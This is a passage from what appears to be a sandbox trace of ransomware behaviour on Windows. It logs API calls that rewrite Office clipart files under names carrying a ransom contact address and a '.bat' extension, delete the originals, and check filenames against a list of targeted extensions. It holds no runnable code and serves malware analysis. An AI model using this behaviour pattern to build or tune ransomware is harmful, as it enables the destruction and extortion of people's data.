office\\root\\clipart\\pub60cor\\j0099199.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0070.079] GetLastError () returned 0x0 [0070.079] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x84b7, lpOverlapped=0x0) returned 1 [0070.134] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x84c0, lpOverlapped=0x0) returned 1 [0070.135] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.135] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.135] SetEndOfFile (hFile=0x308) returned 1 [0070.135] CloseHandle (hObject=0x308) returned 1 [0070.135] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.135] SetEndOfFile (hFile=0x340) returned 1 [0070.136] CloseHandle (hObject=0x340) returned 1 [0070.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif")) returned 1 [0070.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString=".doc") returned 4 [0070.137] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.137] lstrlenW (lpString=".docx") returned 5 [0070.137] lstrcmpiW (lpString1=".docx", lpString2="9.GIF") returned -1 [0070.137] lstrlenW (lpString=".pdf") returned 4 [0070.137] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.137] lstrlenW (lpString=".xls") returned 4 [0070.137] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.137] lstrlenW (lpString=".xlsx") returned 5 [0070.137] lstrcmpiW (lpString1=".xlsx", lpString2="9.GIF") returned -1 [0070.137] lstrlenW (lpString=".ppt") returned 4 [0070.137] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString=".zip") returned 4 [0070.137] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.137] lstrlenW (lpString=".rar") returned 4 [0070.137] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.137] lstrlenW (lpString=".bz2") returned 4 [0070.137] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.137] lstrlenW (lpString=".7z") returned 3 [0070.137] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString=".dbf") returned 4 [0070.137] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString=".1cd") returned 4 [0070.137] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 68 [0070.137] lstrlenW (lpString=".jpg") returned 4 [0070.137] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.138] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.138] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0070.138] GetLastError () returned 0x0 [0070.138] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xf40, lpOverlapped=0x0) returned 1 [0070.151] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf50, lpOverlapped=0x0) returned 1 [0070.152] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.152] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.152] SetEndOfFile (hFile=0x308) returned 1 [0070.152] CloseHandle (hObject=0x308) returned 1 [0070.153] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.153] SetEndOfFile (hFile=0x340) returned 1 [0070.153] CloseHandle (hObject=0x340) returned 1 [0070.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.154] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif")) returned 1 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString=".doc") returned 4 [0070.156] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.156] lstrlenW (lpString=".docx") returned 5 [0070.156] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1 [0070.156] lstrlenW (lpString=".pdf") returned 4 [0070.156] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.156] lstrlenW (lpString=".xls") returned 4 [0070.156] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.156] lstrlenW (lpString=".xlsx") returned 5 [0070.156] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1 [0070.156] lstrlenW (lpString=".ppt") returned 4 [0070.156] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString=".zip") returned 4 [0070.156] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.156] lstrlenW (lpString=".rar") returned 4 [0070.156] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.156] lstrlenW (lpString=".bz2") returned 4 [0070.156] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.156] lstrlenW (lpString=".7z") returned 3 [0070.156] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString=".dbf") returned 4 [0070.156] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString=".1cd") returned 4 [0070.156] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 68 [0070.156] lstrlenW (lpString=".jpg") returned 4 [0070.156] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.157] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.157] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.160] GetLastError () returned 0x0 [0070.160] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x133f8, lpOverlapped=0x0) returned 1 [0070.217] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x13400, lpOverlapped=0x0) returned 1 [0070.219] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.219] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.219] SetEndOfFile (hFile=0x368) returned 1 [0070.448] CloseHandle (hObject=0x368) returned 1 [0070.449] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.449] SetEndOfFile (hFile=0x308) returned 1 [0070.450] CloseHandle (hObject=0x308) returned 1 [0070.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp")) returned 1 [0070.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.451] lstrlenW (lpString=".doc") returned 4 [0070.451] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.451] lstrlenW (lpString=".docx") returned 5 [0070.451] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1 [0070.451] lstrlenW (lpString=".pdf") returned 4 [0070.451] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.451] lstrlenW (lpString=".xls") returned 4 [0070.451] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.451] lstrlenW (lpString=".xlsx") returned 5 [0070.452] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1 [0070.452] lstrlenW (lpString=".ppt") returned 4 [0070.452] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.452] lstrlenW (lpString=".zip") returned 4 [0070.452] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.452] lstrlenW (lpString=".rar") returned 4 [0070.452] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.452] lstrlenW (lpString=".bz2") returned 4 [0070.452] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.452] lstrlenW (lpString=".7z") returned 3 [0070.452] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.452] lstrlenW (lpString=".dbf") returned 4 [0070.452] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.452] lstrlenW (lpString=".1cd") returned 4 [0070.452] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 68 [0070.452] lstrlenW (lpString=".jpg") returned 4 [0070.452] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.453] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.453] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.453] GetLastError () returned 0x0 [0070.453] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.462] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.463] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.463] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.463] SetEndOfFile (hFile=0x368) returned 1 [0070.464] CloseHandle (hObject=0x368) returned 1 [0070.464] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.464] SetEndOfFile (hFile=0x308) returned 1 [0070.465] CloseHandle (hObject=0x308) returned 1 [0070.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.465] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp")) returned 1 [0070.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.466] lstrlenW (lpString=".doc") returned 4 [0070.466] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString=".docx") returned 5 [0070.466] lstrcmpiW (lpString1=".docx", lpString2="1.BMP") returned -1 [0070.466] lstrlenW (lpString=".pdf") returned 4 [0070.466] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString=".xls") returned 4 [0070.466] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString=".xlsx") returned 5 [0070.466] lstrcmpiW (lpString1=".xlsx", lpString2="1.BMP") returned -1 [0070.466] lstrlenW (lpString=".ppt") returned 4 [0070.466] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.466] lstrlenW (lpString=".zip") returned 4 [0070.466] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString=".rar") returned 4 [0070.466] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.466] lstrlenW (lpString=".bz2") returned 4 [0070.467] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.467] lstrlenW (lpString=".7z") returned 3 [0070.467] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.467] lstrlenW (lpString=".dbf") returned 4 [0070.467] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.467] lstrlenW (lpString=".1cd") returned 4 [0070.467] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 68 [0070.467] lstrlenW (lpString=".jpg") returned 4 [0070.467] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.467] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.467] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.468] GetLastError () returned 0x0 [0070.468] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.483] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.484] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.484] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.484] SetEndOfFile (hFile=0x368) returned 1 [0070.485] CloseHandle (hObject=0x368) returned 1 [0070.485] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.485] SetEndOfFile (hFile=0x308) returned 1 [0070.486] CloseHandle (hObject=0x308) returned 1 [0070.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp")) returned 1 [0070.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.487] lstrlenW (lpString=".doc") returned 4 [0070.487] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".docx") returned 5 [0070.487] lstrcmpiW (lpString1=".docx", lpString2="2.BMP") returned -1 [0070.487] lstrlenW (lpString=".pdf") returned 4 [0070.487] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".xls") returned 4 [0070.487] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".xlsx") returned 5 [0070.487] lstrcmpiW (lpString1=".xlsx", lpString2="2.BMP") returned -1 [0070.487] lstrlenW (lpString=".ppt") returned 4 [0070.487] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.487] lstrlenW (lpString=".zip") returned 4 [0070.487] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".rar") returned 4 [0070.487] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".bz2") returned 4 [0070.487] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.487] lstrlenW (lpString=".7z") returned 3 [0070.488] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.488] lstrlenW (lpString=".dbf") returned 4 [0070.488] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.488] lstrlenW (lpString=".1cd") returned 4 [0070.488] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 68 [0070.488] lstrlenW (lpString=".jpg") returned 4 [0070.488] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.488] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.488] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.489] GetLastError () returned 0x0 [0070.489] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.528] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.529] ReadFile (in: hFile=0x308, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.529] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.529] SetEndOfFile (hFile=0x368) returned 1 [0070.530] CloseHandle (hObject=0x368) returned 1 [0070.530] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.530] SetEndOfFile (hFile=0x308) returned 1 [0070.531] CloseHandle (hObject=0x308) returned 1 [0070.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp")) returned 1 [0070.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 68 [0070.531] lstrlenW (lpString="C:\\Program Files\\Microsoft 